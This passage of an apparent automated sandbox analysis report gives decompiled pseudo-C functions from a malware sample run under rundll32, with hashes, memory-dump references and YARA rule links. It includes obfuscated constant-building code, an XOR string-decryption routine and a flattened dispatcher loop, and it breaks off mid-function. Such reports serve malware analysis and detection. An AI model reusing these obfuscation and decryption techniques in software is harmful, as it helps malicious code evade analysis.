Instruction Fuzzy Hash: 9251E3B0C0020EABDF54CFE4C98A8EEBBB1FB54314F208149E911B6260D3794B54DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 001B0065, Relevance: 3.8, Strings: 3, Instructions: 97
COMMONCrypto

Download Yara Rule

C-Code - Quality: 79%

			E001B0065(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				void* _t98;
				signed int _t111;
				signed int _t112;
				signed int _t113;

				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001AD571(_t98);
				_v32 = 0x755b;
				_v32 = _v32 ^ 0x7dbdfe60;
				_v32 = _v32 ^ 0x7dbdbb09;
				_v8 = 0xc028;
				_v8 = _v8 ^ 0xc114373d;
				_v8 = _v8 ^ 0x97b3d78c;
				_v8 = _v8 ^ 0xf8767868;
				_v8 = _v8 ^ 0xaed17c52;
				_v28 = 0x6b33;
				_v28 = _v28 ^ 0xc5c1c0a7;
				_v28 = _v28 ^ 0xc5c1a983;
				_v16 = 0xf7dc;
				_t111 = 0x35;
				_v16 = _v16 / _t111;
				_v16 = _v16 << 0xb;
				_v16 = _v16 + 0x3d0c;
				_v16 = _v16 ^ 0x0025bfca;
				_v36 = 0x9b2c;
				_v36 = _v36 + 0xfffffecb;
				_v36 = _v36 ^ 0x0000d99c;
				_v24 = 0xb8e;
				_v24 = _v24 + 0xffff9c64;
				_v24 = _v24 + 0xffff30f8;
				_v24 = _v24 ^ 0xfffe9b12;
				_v12 = 0x6ba4;
				_v12 = _v12 | 0xbe6690b5;
				_v12 = _v12 >> 9;
				_t112 = 9;
				_v12 = _v12 * 0x4c;
				_v12 = _v12 ^ 0x1c434bfa;
				_v20 = 0x334e;
				_v20 = _v20 << 9;
				_v20 = _v20 >> 0xf;
				_v20 = _v20 | 0xdbae22e0;
				_v20 = _v20 ^ 0xdbae13b7;
				_v44 = 0x60c0;
				_t113 = 0x64;
				_v44 = _v44 / _t112;
				_v44 = _v44 ^ 0x00007d99;
				_v40 = 0x3ffc;
				_v40 = _v40 / _t113;
				_v40 = _v40 ^ 0x000050b9;
				_push(_v28);
				_push(_v8);
				E001AEC82(_v40, E001A5EBA(_v32, 0x1001f9b0, _v40), _v16, _v36, _v24, _v12, __ecx, _a8);
				return E001AED35(_v20, _t107, _v44, _v40);
			}

0x001b006d
0x001b0072
0x001b0075
0x001b0078
0x001b007b
0x001b007e
0x001b007f
0x001b0080
0x001b0085
0x001b008e
0x001b0095
0x001b009c
0x001b00a3
0x001b00aa
0x001b00b1
0x001b00b8
0x001b00bf
0x001b00c6
0x001b00cd
0x001b00d4
0x001b00e0
0x001b00e5
0x001b00ea
0x001b00ee
0x001b00f5
0x001b00fc
0x001b0103
0x001b010a
0x001b0111
0x001b0118
0x001b011f
0x001b0126
0x001b012d
0x001b0134
0x001b013b
0x001b0143
0x001b0146
0x001b0149
0x001b0150
0x001b0157
0x001b015b
0x001b015f
0x001b0166
0x001b016d
0x001b0179
0x001b017a
0x001b017f
0x001b0186
0x001b0197
0x001b019a
0x001b01a1
0x001b01a4
0x001b01c5
0x001b01e4

Strings

[u, xrefs: 001B0085
N3, xrefs: 001B0150
3k, xrefs: 001B00BF

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 3k$N3$[u
API String ID: 0-953518783
Opcode ID: b3916ff96ca100d95304d1787f30861973690e4621985a024f5e0917675eafaa
Instruction ID: 4ec41328e083ec4efb4b4ef85550fbf07a69707f4929a4d3b28f619167a6f670
Opcode Fuzzy Hash: b3916ff96ca100d95304d1787f30861973690e4621985a024f5e0917675eafaa
Instruction Fuzzy Hash: B7410375D00219EFDF09CFA1D84A8EEBFB2FB44314F208149E511762A0D7B55A55DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 1000BCEA, Relevance: 3.0, APIs: 2, Instructions: 8
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1000BCEA(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				return UnhandledExceptionFilter(_a4);
			}

0x1000bcef
0x1000bcff

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 1000BCEF
UnhandledExceptionFilter.KERNEL32(?), ref: 1000BCF8

Memory Dump Source

Source File: 00000007.00000002.2144561604.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2144552179.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144633674.000000001001D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144648856.0000000010026000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2144655977.000000001002A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: a968f012bd862455feccb843d5b2daa2d592b01e33ea46b5696c35821fe3d0fe
Instruction ID: 7f07df9ede202a96194a7105312b822c27ac8aebee8808895142cfb6749b682c
Opcode Fuzzy Hash: a968f012bd862455feccb843d5b2daa2d592b01e33ea46b5696c35821fe3d0fe
Instruction Fuzzy Hash: EDB09231044228ABEB063BA1DC59B483F28EB0865AF008012F60D44062CB72D4228A95

Uniqueness

Uniqueness Score: -1.00%

Function 001A6D2C, Relevance: 2.6, Strings: 2, Instructions: 114
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E001A6D2C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				void* _t79;
				void* _t90;
				signed int _t95;
				signed int _t96;
				void* _t99;
				void* _t116;
				signed int* _t119;

				_push(_a12);
				_t115 = _a8;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001AD571(_t79);
				_v56 = 0xdb3e;
				_t119 =  &(( &_v76)[5]);
				_v56 = _v56 >> 6;
				_v56 = _v56 ^ 0x00007fbe;
				_t116 = 0;
				_v76 = 0xd73d;
				_t99 = 0xf7121a4;
				_t95 = 0x1b;
				_v76 = _v76 * 0xc;
				_v76 = _v76 / _t95;
				_t96 = 0x4f;
				_v76 = _v76 * 0x32;
				_v76 = _v76 ^ 0x001287b1;
				_v52 = 0xd015;
				_v52 = _v52 >> 8;
				_v52 = _v52 ^ 0x000059da;
				_v72 = 0x3b8c;
				_v72 = _v72 >> 1;
				_v72 = _v72 * 0x1d;
				_v72 = _v72 << 0xc;
				_v72 = _v72 ^ 0x35f682ae;
				_v60 = 0x1c58;
				_v60 = _v60 / _t96;
				_v60 = _v60 >> 9;
				_v60 = _v60 ^ 0x00006e3c;
				_v48 = 0x11;
				_v48 = _v48 << 3;
				_v48 = _v48 ^ 0x000035a8;
				_v64 = 0xb960;
				_v64 = _v64 | 0xa416bc7b;
				_v64 = _v64 * 0x7c;
				_v64 = _v64 ^ 0x7b03b1f6;
				_v68 = 0x8846;
				_v68 = _v68 * 0x6b;
				_v68 = _v68 + 0xffffbf62;
				_v68 = _v68 ^ 0x0038927d;
				do {
					while(_t99 != 0xf7121a4) {
						if(_t99 == 0x280bf9cf) {
							_t90 = E001A2945( &_v44, _v52, __eflags, _v72, _t115);
							_t119 =  &(_t119[2]);
							__eflags = _t90;
							if(__eflags != 0) {
								_t99 = 0x2c6a21f1;
								continue;
							}
						} else {
							if(_t99 == 0x2c6a21f1) {
								__eflags = E001B2DA9( &_v44, _v60, _v48, _v64, _t115 + 8, _v68);
								_t116 =  !=  ? 1 : _t116;
							} else {
								if(_t99 != 0x2fbbf61e) {
									goto L9;
								} else {
									E001BC395(_v56,  &_v44, _a12, _v76);
									_t99 = 0x280bf9cf;
									continue;
								}
							}
						}
						L12:
						return _t116;
					}
					_t99 = 0x2fbbf61e;
					L9:
					__eflags = _t99 - 0x20655de9;
				} while (__eflags != 0);
				goto L12;
			}

0x001a6d33
0x001a6d37
0x001a6d3b
0x001a6d3c
0x001a6d40
0x001a6d41
0x001a6d42
0x001a6d47
0x001a6d4f
0x001a6d52
0x001a6d59
0x001a6d61
0x001a6d63
0x001a6d6b
0x001a6d7c
0x001a6d7f
0x001a6d8b
0x001a6d94
0x001a6d95
0x001a6d99
0x001a6da1
0x001a6da9
0x001a6dae
0x001a6db6
0x001a6dbe
0x001a6dc7
0x001a6dcb
0x001a6dd0
0x001a6dd8
0x001a6deb
0x001a6def
0x001a6df4
0x001a6dfc
0x001a6e04
0x001a6e09
0x001a6e11
0x001a6e19
0x001a6e26
0x001a6e2a
0x001a6e32
0x001a6e3f
0x001a6e43
0x001a6e4b
0x001a6e53
0x001a6e53
0x001a6e61
0x001a6e96
0x001a6e9b
0x001a6e9e
0x001a6ea0
0x001a6ea2
0x00000000
0x001a6ea2
0x001a6e63
0x001a6e65
0x001a6ed5
0x001a6ed7
0x001a6e67
0x001a6e69
0x00000000
0x001a6e6b
0x001a6e7b
0x001a6e82
0x00000000
0x001a6e82
0x001a6e69
0x001a6e65
0x001a6edb
0x001a6ee3
0x001a6ee3
0x001a6ea6
0x001a6ea8
0x001a6ea8
0x001a6ea8
0x00000000

Strings

<n, xrefs: 001A6DF4
]e , xrefs: 001A6EA8

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: <n$]e
API String ID: 0-226634354
Opcode ID: 998031ca5449c83ad1e6403b3d71f97644e5c44c02d51265a03d2ff5b044c01d
Instruction ID: d3a3459eabd874e63fbc5c39255927fd82ae9987ec1a3a951cd659323248cf7f
Opcode Fuzzy Hash: 998031ca5449c83ad1e6403b3d71f97644e5c44c02d51265a03d2ff5b044c01d
Instruction Fuzzy Hash: EB4165791083029FD708CF25D98981BBBE1FFD4B48F204A1DF586A6261D774CA49CB93

Uniqueness

Uniqueness Score: -1.00%

Function 001B9494, Relevance: 2.6, Strings: 2, Instructions: 102
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E001B9494(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				unsigned int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void* _t87;
				intOrPtr _t96;
				signed int _t104;
				void* _t114;

				_push(_a16);
				_t114 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0x1001f200);
				E001AD571(_t87);
				_v52 = 0x21c86b;
				_v48 = 0x76557e;
				_v44 = 0;
				_v24 = 0x63a6;
				_v24 = _v24 + 0xb97;
				_v24 = _v24 | 0x545973d7;
				_v24 = _v24 ^ 0x545949e3;
				_v32 = 0xfab7;
				_v32 = _v32 >> 6;
				_v32 = _v32 ^ 0x00002a21;
				_v20 = 0x47e1;
				_v20 = _v20 + 0xd8c4;
				_v20 = _v20 >> 5;
				_v20 = _v20 ^ 0x00000fc9;
				_v8 = 0xeb9b;
				_v8 = _v8 << 0xe;
				_v8 = _v8 * 7;
				_v8 = _v8 ^ 0x0984a14c;
				_v8 = _v8 ^ 0x95cbb920;
				_v36 = 0x7d6f;
				_v36 = _v36 >> 3;
				_v36 = _v36 ^ 0x00007cc5;
				_v12 = 0x27be;
				_v12 = _v12 | 0x9a688f43;
				_v12 = _v12 + 0x4446;
				_v12 = _v12 + 0xffff0760;
				_v12 = _v12 ^ 0x9a678b49;
				_v28 = 0x2743;
				_v28 = _v28 >> 0x10;
				_v28 = _v28 * 0x3c;
				_v28 = _v28 ^ 0x00002e4d;
				_v40 = 0x1588;
				_v40 = _v40 * 0x2f;
				_v40 = _v40 ^ 0x0003ac65;
				_v16 = 0x2581;
				_v16 = _v16 << 4;
				_v16 = _v16 + 0xb76;
				_v16 = _v16 ^ 0x8774b782;
				_v16 = _v16 ^ 0x8776cfce;
				_t96 = E001B922B(0x40);
				 *0x1001f9d4 = _t96;
				if(_t96 == 0) {
					L7:
					return 0;
				}
				_t104 =  *(_t96 + 0x20);
				 *((intOrPtr*)(_t96 + 0x28)) = 0x1001f200;
				 *((intOrPtr*)(_t96 + 8)) = 0x1001f200;
				 *((intOrPtr*)(_t96 + 0x3c)) = 0;
				while( *((intOrPtr*)(0x1001f200 + _t104 * 8)) != 0) {
					_t104 = _t104 + 1;
					 *(_t96 + 0x20) = _t104;
				}
				if(E001B5CCB(_v36, _v12, _t114, _v28) == 0) {
					E001AE380(_v40,  *0x1001f9d4, _v16);
					goto L7;
				}
				return 1;
			}

0x001b949d
0x001b94a0
0x001b94a7
0x001b94aa
0x001b94ad
0x001b94b0
0x001b94b1
0x001b94b2
0x001b94b7
0x001b94c0
0x001b94ca
0x001b94cd
0x001b94d4
0x001b94db
0x001b94e2
0x001b94e9
0x001b94f0
0x001b94f4
0x001b94fb
0x001b9502
0x001b9509
0x001b950d
0x001b9514
0x001b951b
0x001b9525
0x001b9528
0x001b952f
0x001b9536
0x001b953d
0x001b9541
0x001b9548
0x001b954f
0x001b9556
0x001b955d
0x001b9564
0x001b956b
0x001b9572
0x001b957a
0x001b957d
0x001b9584
0x001b958f
0x001b9592
0x001b9599
0x001b95a0
0x001b95a4
0x001b95ab
0x001b95b2
0x001b95c5
0x001b95cd
0x001b95d4
0x001b961d
0x00000000
0x001b961d
0x001b95d6
0x001b95d9
0x001b95dc
0x001b95df
0x001b95e8
0x001b95e4
0x001b95e5
0x001b95e5
0x001b9604
0x001b9617
0x00000000
0x001b961c
0x00000000

Strings

IYT, xrefs: 001B94E2
~Uv, xrefs: 001B94C0

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ~Uv$IYT
API String ID: 0-2158705046
Opcode ID: 43e6a5243acf630b5075f82a2fa0c77286b9ab0d80e33fffeb5108f1f2f88fda
Instruction ID: 01e3ecce74e1a1f7534fdb8b29c1aa816b3753d52564b6eb63fcc4f28a13320e
Opcode Fuzzy Hash: 43e6a5243acf630b5075f82a2fa0c77286b9ab0d80e33fffeb5108f1f2f88fda
Instruction Fuzzy Hash: E24134B2C00219EFDB05CFA5C98A8EEBBB0FF54304F208499D515B7260D3B89A45DF95

Uniqueness

Uniqueness Score: -1.00%

Function 001A33AB, Relevance: 2.6, Strings: 2, Instructions: 100
COMMONCrypto

Download Yara Rule

C-Code - Quality: 21%

			E001A33AB(void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				char _v560;
				intOrPtr* _t104;
				signed int _t108;
				signed int _t109;
				signed int _t110;
				signed int _t111;
				signed int _t112;

				_v40 = 0;
				_v8 = 0x45dc;
				_v8 = _v8 + 0xffff762b;
				_v8 = _v8 + 0xfffff449;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07fffb7e;
				_v24 = 0x6954;
				_t108 = 0x53;
				_v24 = _v24 / _t108;
				_v24 = _v24 >> 3;
				_v24 = _v24 ^ 0x00002f64;
				_v16 = 0x4ff7;
				_v16 = _v16 | 0x94d957a5;
				_v16 = _v16 ^ 0xc96e7ce7;
				_t109 = 0x28;
				_v16 = _v16 / _t109;
				_v16 = _v16 ^ 0x0257c227;
				_v20 = 0xa16;
				_v20 = _v20 << 2;
				_v20 = _v20 ^ 0x34afe4ef;
				_t110 = 0xa;
				_v20 = _v20 / _t110;
				_v20 = _v20 ^ 0x0544a66f;
				_v28 = 0xd693;
				_v28 = _v28 | 0x4d95e164;
				_t111 = 0x45;
				_v28 = _v28 / _t111;
				_v28 = _v28 ^ 0x011f90f9;
				_v32 = 0xd860;
				_v32 = _v32 * 0x5a;
				_v32 = _v32 ^ 0x004c03db;
				_v12 = 0x599b;
				_v12 = _v12 << 5;
				_v12 = _v12 + 0xffffa0b4;
				_v12 = _v12 | 0xe0a08773;
				_v12 = _v12 ^ 0xe0aabedc;
				_v36 = 0x7b48;
				_v36 = _v36 << 0xa;
				_v36 = _v36 ^ 0x01ed05da;
				_t112 = _v8;
				if(E001B2CD1(_t112,  &_v560, _v24, _t111, _v16) != 0) {
					_t104 =  &_v560;
					if(_v560 != 0) {
						while( *_t104 != 0x5c) {
							_t104 = _t104 + 2;
							if( *_t104 != 0) {
								continue;
							} else {
							}
							goto L6;
						}
						_t112 = 0;
						 *((short*)(_t104 + 2)) = 0;
					}
					L6:
					_push(_t112);
					_push(_v36);
					_push(_v12);
					_push(_v32);
					_push( &_v560);
					_push(_v28);
					_push( &_v40);
					_push(_t112);
					E001B8BE2(_t112, _v20);
				}
				return _v40;
			}

0x001a33b9
0x001a33bc
0x001a33c3
0x001a33ca
0x001a33d1
0x001a33d5
0x001a33dc
0x001a33e8
0x001a33ed
0x001a33f2
0x001a33f6
0x001a33fd
0x001a3404
0x001a340b
0x001a3415
0x001a341a
0x001a341f
0x001a3426
0x001a342d
0x001a3431
0x001a343b
0x001a3440
0x001a3445
0x001a344c
0x001a3453
0x001a345d
0x001a3466
0x001a3469
0x001a3470
0x001a347b
0x001a347e
0x001a3485
0x001a348c
0x001a3490
0x001a3497
0x001a349e
0x001a34a5
0x001a34ac
0x001a34b0
0x001a34be
0x001a34cb
0x001a34cd
0x001a34da
0x001a34dc
0x001a34e2
0x001a34e8
0x00000000
0x00000000
0x001a34ea
0x00000000
0x001a34e8
0x001a34ec
0x001a34ee
0x001a34ee
0x001a34f2
0x001a34f2
0x001a34f3
0x001a34fc
0x001a34ff
0x001a3505
0x001a3506
0x001a350f
0x001a3510
0x001a3511
0x001a3516
0x001a3520

Strings

H{, xrefs: 001A34A5
d/, xrefs: 001A33F6

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: H{$d/
API String ID: 0-2275131086
Opcode ID: 36fbb4c2a2ae0c68f8c6c4e1a418c6157839b98d6d02cc2e246d424671e84a19
Instruction ID: 1307e9103f32803bd5d2d8ad35e11ca2c95417e75f48e5f327f740cc677fcfbd
Opcode Fuzzy Hash: 36fbb4c2a2ae0c68f8c6c4e1a418c6157839b98d6d02cc2e246d424671e84a19
Instruction Fuzzy Hash: E3411272D0020EEBDF19DFA5D94A9EEBBB1FB04704F208099E515B6290E3B55B48CF91

Uniqueness

Uniqueness Score: -1.00%

Function 001A5EBA, Relevance: 2.6, Strings: 2, Instructions: 99
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E001A5EBA(void* __ecx, signed int* __edx, void* __eflags) {
				void* _t53;
				signed int _t58;
				short* _t77;
				signed int _t78;
				signed int _t80;
				signed int _t85;
				unsigned int _t86;
				unsigned int _t87;
				short* _t90;
				signed int* _t91;
				signed int* _t92;
				unsigned int _t94;
				void* _t100;
				short _t102;
				void* _t104;
				void* _t106;

				_push( *(_t104 + 0x2c));
				_push( *(_t104 + 0x2c));
				_push(__edx);
				E001AD571(_t53);
				 *(_t104 + 0x24) = 0xa1e0;
				_t91 =  &(__edx[1]);
				 *(_t104 + 0x24) =  *(_t104 + 0x24) >> 6;
				 *(_t104 + 0x24) =  *(_t104 + 0x24) + 0x6484;
				 *(_t104 + 0x24) =  *(_t104 + 0x24) ^ 0x00004c34;
				 *(_t104 + 0x1c) = 0xe5ad;
				 *(_t104 + 0x1c) =  *(_t104 + 0x1c) * 0xb;
				 *(_t104 + 0x1c) =  *(_t104 + 0x1c) << 0xb;
				 *(_t104 + 0x1c) =  *(_t104 + 0x1c) | 0x1f75fa72;
				 *(_t104 + 0x1c) =  *(_t104 + 0x1c) ^ 0x5ff7909c;
				 *(_t104 + 0x28) = 0xe962;
				 *(_t104 + 0x28) =  *(_t104 + 0x28) * 0x51;
				 *(_t104 + 0x28) =  *(_t104 + 0x28) ^ 0x004993fd;
				 *(_t104 + 0x20) = 0xd249;
				 *(_t104 + 0x20) =  *(_t104 + 0x20) >> 0xa;
				 *(_t104 + 0x20) =  *(_t104 + 0x20) >> 1;
				 *(_t104 + 0x20) =  *(_t104 + 0x20) ^ 0x000031d0;
				_t80 =  *__edx;
				_t92 =  &(_t91[1]);
				_t58 =  *_t91 ^ _t80;
				 *(_t104 + 0x2c) = _t80;
				 *(_t104 + 0x30) = _t58;
				_t94 =  !=  ? (_t58 + 0x00000001 & 0xfffffffc) + 4 : _t58 + 1;
				_t77 = E001B922B(_t94 + _t94);
				_t106 = _t104 + 0x14;
				 *((intOrPtr*)(_t106 + 0x18)) = _t77;
				if(_t77 != 0) {
					_t102 = 0;
					_t90 = _t77;
					_t100 =  >  ? 0 :  &(_t92[_t94 >> 2]) - _t92 + 3 >> 2;
					if(_t100 != 0) {
						_t78 =  *(_t106 + 0x20);
						do {
							_t85 =  *_t92;
							_t92 =  &(_t92[1]);
							_t86 = _t85 ^ _t78;
							 *_t90 = _t86 & 0x000000ff;
							_t90 = _t90 + 8;
							 *((short*)(_t90 - 6)) = _t86 >> 0x00000008 & 0x000000ff;
							_t87 = _t86 >> 0x10;
							_t102 = _t102 + 1;
							 *((short*)(_t90 - 4)) = _t87 & 0x000000ff;
							 *((short*)(_t90 - 2)) = _t87 >> 0x00000008 & 0x000000ff;
						} while (_t102 < _t100);
						_t77 =  *((intOrPtr*)(_t106 + 0x1c));
					}
					 *((short*)(_t77 +  *(_t106 + 0x24) * 2)) = 0;
				}
				return _t77;
			}

0x001a5ec0
0x001a5ec4
0x001a5ec8
0x001a5eca
0x001a5ecf
0x001a5ed7
0x001a5eda
0x001a5edf
0x001a5ee7
0x001a5eef
0x001a5efc
0x001a5f00
0x001a5f05
0x001a5f0d
0x001a5f15
0x001a5f22
0x001a5f26
0x001a5f2e
0x001a5f36
0x001a5f3b
0x001a5f3f
0x001a5f47
0x001a5f4b
0x001a5f4e
0x001a5f50
0x001a5f54
0x001a5f68
0x001a5f87
0x001a5f89
0x001a5f8c
0x001a5f92
0x001a5f9a
0x001a5f9c
0x001a5fad
0x001a5fb2
0x001a5fb4
0x001a5fb8
0x001a5fb8
0x001a5fba
0x001a5fbd
0x001a5fc2
0x001a5fca
0x001a5fd0
0x001a5fd4
0x001a5fdd
0x001a5fde
0x001a5fe5
0x001a5fe9
0x001a5fed
0x001a5fed
0x001a5ff8
0x001a5ff8
0x001a6004

Strings

4L, xrefs: 001A5EE7
b, xrefs: 001A5F15

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 4L$b
API String ID: 0-1753729215
Opcode ID: 2e314a022bdf3d6830e1993ba014f6b7c33f935702aecd270740c451f06e70c5
Instruction ID: 46f824347faf7c6938f274fc3378431dd2cac3bd5e1b1c6f9d7410cc4900cad0
Opcode Fuzzy Hash: 2e314a022bdf3d6830e1993ba014f6b7c33f935702aecd270740c451f06e70c5
Instruction Fuzzy Hash: EB415972A087118FD304CF29C48585AFBE0FF98718F414A6EF899A7250D774EA09CF96

Uniqueness

Uniqueness Score: -1.00%

Function 001A3521, Relevance: 2.6, Strings: 2, Instructions: 88
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E001A3521(void* __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _t122;
				signed int _t123;
				signed int _t124;
				signed int _t125;

				_v8 = 0xd482;
				_v8 = _v8 | 0x3f4d3094;
				_v8 = _v8 >> 0xf;
				_t122 = 0x6c;
				_v8 = _v8 / _t122;
				_v8 = _v8 ^ 0x00002ebf;
				_v16 = 0x9738;
				_v16 = _v16 >> 0xd;
				_v16 = _v16 ^ 0x38240ed5;
				_v16 = _v16 ^ 0x38246a1a;
				_v12 = 0xd145;
				_t123 = 0x79;
				_v12 = _v12 / _t123;
				_v12 = _v12 ^ 0x5b70918a;
				_v12 = _v12 ^ 0x5b70dd81;
				_v32 = 0x9c6c;
				_t124 = 0x4f;
				_v32 = _v32 / _t124;
				_v32 = _v32 ^ 0x00007668;
				_v24 = 0xe988;
				_v24 = _v24 ^ 0x7e4bafdf;
				_t125 = 0x30;
				_v24 = _v24 / _t125;
				_v24 = _v24 ^ 0x02a1b82f;
				_v28 = 0xa7de;
				_v28 = _v28 + 0xf9c8;
				_v28 = _v28 ^ 0x0001fb4a;
				_v20 = 0x96ad;
				_v20 = _v20 << 2;
				_v20 = _v20 | 0xda18e41e;
				_v20 = _v20 ^ 0xda1afe0b;
				_v44 = 0x693f;
				_v44 = _v44 << 0xf;
				_v44 = _v44 ^ 0x349fb644;
				_v40 = 0x60cb;
				_v40 = _v40 * 0x1b;
				_v40 = _v40 ^ 0x000a5dc2;
				_v36 = 0xaf25;
				_v36 = _v36 | 0x497a0d1f;
				_v36 = _v36 ^ 0x497a9209;
				_push(_v12);
				_push(_v16);
				 *((intOrPtr*)( *0x10020720 + 0x1c + __edx * 4)) = E001B6D98(_v32, _v28, _v20, E001A5EBA(_v8, __ecx, _v36));
				return E001AED35(_v44, _t101, _v40, _v36);
			}

0x001a3527
0x001a352e
0x001a3535
0x001a3544
0x001a3549
0x001a354e
0x001a3555
0x001a355c
0x001a3560
0x001a3567
0x001a356e
0x001a3578
0x001a357d
0x001a3582
0x001a3589
0x001a3590
0x001a359a
0x001a359f
0x001a35a4
0x001a35ab
0x001a35b2
0x001a35bc
0x001a35c1
0x001a35c4
0x001a35cb
0x001a35d2
0x001a35d9
0x001a35e0
0x001a35e7
0x001a35eb
0x001a35f2
0x001a35f9
0x001a3600
0x001a3604
0x001a360b
0x001a3616
0x001a3619
0x001a3620
0x001a3627
0x001a362e
0x001a3635
0x001a3638
0x001a3665
0x001a3679

Strings

?i, xrefs: 001A35F9
hv, xrefs: 001A35A4

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ?i$hv
API String ID: 0-2289810265
Opcode ID: 3640f0c25ea5ad5a68058d64fbd023fc64751400f61fcd6f14f2a7179ae74719
Instruction ID: 359c82c65da913516250de3f3e56befb45fc4eae9c3bf36c737dc43341908c06
Opcode Fuzzy Hash: 3640f0c25ea5ad5a68058d64fbd023fc64751400f61fcd6f14f2a7179ae74719
Instruction Fuzzy Hash: EC41E372D01219EBDB08DFA5C94A4EEBFB2FB44314F208099D511BA250C7791B16DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 001AE380, Relevance: 2.6, Strings: 2, Instructions: 80
COMMONCrypto

Download Yara Rule

C-Code - Quality: 82%

			E001AE380(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				void* _v28;
				intOrPtr _v32;
				void* _t76;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t95;
				void* _t107;

				_push(_a4);
				_t107 = __edx;
				_push(__edx);
				_push(__ecx);
				E001AD571(_t76);
				_v32 = 0x4e91b6;
				asm("stosd");
				_t92 = 0x47;
				asm("stosd");
				asm("stosd");
				_v16 = 0x6775;
				_v16 = _v16 >> 2;
				_v16 = _v16 ^ 0x00000a54;
				_v12 = 0x2e88;
				_v12 = _v12 >> 0xf;
				_v12 = _v12 | 0xc6e1cf8f;
				_v12 = _v12 / _t92;
				_v12 = _v12 ^ 0x02cd60f0;
				_v12 = 0x9f5d;
				_t93 = 0x38;
